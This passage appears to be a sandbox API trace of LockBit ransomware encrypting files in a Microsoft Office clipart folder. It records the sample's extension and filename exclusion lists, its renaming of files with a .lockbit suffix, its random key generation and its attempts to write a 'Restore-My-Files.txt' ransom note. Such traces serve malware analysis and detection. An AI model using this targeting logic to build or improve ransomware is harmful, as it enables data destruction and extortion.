[0153.569] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.569] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.570] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.570] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239965.WMF") returned 1 [0153.570] lstrcmpiW (lpString1="ntldr", lpString2="J0239965.WMF") returned 1 [0153.571] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239965.WMF") returned 1 [0153.571] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239965.WMF") returned -1 [0153.571] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239965.WMF") returned -1 [0153.571] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239965.WMF") returned 1 [0153.571] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239965.WMF") returned -1 [0153.571] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.571] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239965.WMF") returned=".WMF" [0153.571] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.571] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.571] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.572] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.572] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239965.WMF.lockbit") returned 72 [0153.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239965.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239965.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.573] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.573] malloc (_Size=0x40068) returned 0x3df0008 [0153.573] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5920) returned 1 [0153.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.575] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.579] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239965.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239965.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.579] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.580] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.581] free (_Block=0x1fa2ed8) [0153.581] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239965.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.582] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5661b6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x154c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239967.WMF", cAlternateFileName="")) returned 1 [0153.582] lstrcmpiW (lpString1=".", lpString2="J0239967.WMF") returned -1 [0153.582] lstrcmpiW (lpString1="..", lpString2="J0239967.WMF") returned -1 [0153.582] PathFindExtensionW (pszPath="J0239967.WMF") returned=".WMF" [0153.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.582] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.583] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.583] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239967.WMF") returned 1 [0153.584] lstrcmpiW (lpString1="ntldr", lpString2="J0239967.WMF") returned 1 [0153.584] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239967.WMF") returned 1 [0153.584] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239967.WMF") returned -1 [0153.584] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239967.WMF") returned -1 [0153.584] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239967.WMF") returned 1 [0153.584] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239967.WMF") returned -1 [0153.584] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.584] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239967.WMF") returned=".WMF" [0153.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.584] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.584] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.585] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.585] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239967.WMF.lockbit") returned 72 [0153.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239967.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239967.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.586] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.586] malloc (_Size=0x40068) returned 0x3df0008 [0153.586] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5452) returned 1 [0153.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.588] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239967.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239967.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.596] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.596] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.597] free (_Block=0x1fa2ed8) [0153.597] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239967.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.597] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.597] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.597] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x13e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0239973.WMF", cAlternateFileName="")) returned 1 [0153.597] lstrcmpiW (lpString1=".", lpString2="J0239973.WMF") returned -1 [0153.597] lstrcmpiW (lpString1="..", lpString2="J0239973.WMF") returned -1 [0153.597] PathFindExtensionW (pszPath="J0239973.WMF") returned=".WMF" [0153.597] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.597] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.597] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.597] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.597] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.597] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.598] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.598] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.599] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0239973.WMF") returned 1 [0153.599] lstrcmpiW (lpString1="ntldr", lpString2="J0239973.WMF") returned 1 [0153.599] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0239973.WMF") returned 1 [0153.599] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0239973.WMF") returned -1 [0153.599] lstrcmpiW (lpString1="autorun.inf", lpString2="J0239973.WMF") returned -1 [0153.599] lstrcmpiW (lpString1="thumbs.db", lpString2="J0239973.WMF") returned 1 [0153.599] lstrcmpiW (lpString1="iconcache.db", lpString2="J0239973.WMF") returned -1 [0153.599] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.600] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239973.WMF") returned=".WMF" [0153.600] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.600] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.600] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.601] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.601] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.601] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.601] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.601] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.601] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.601] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239973.WMF.lockbit") returned 72 [0153.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0239973.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0239973.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 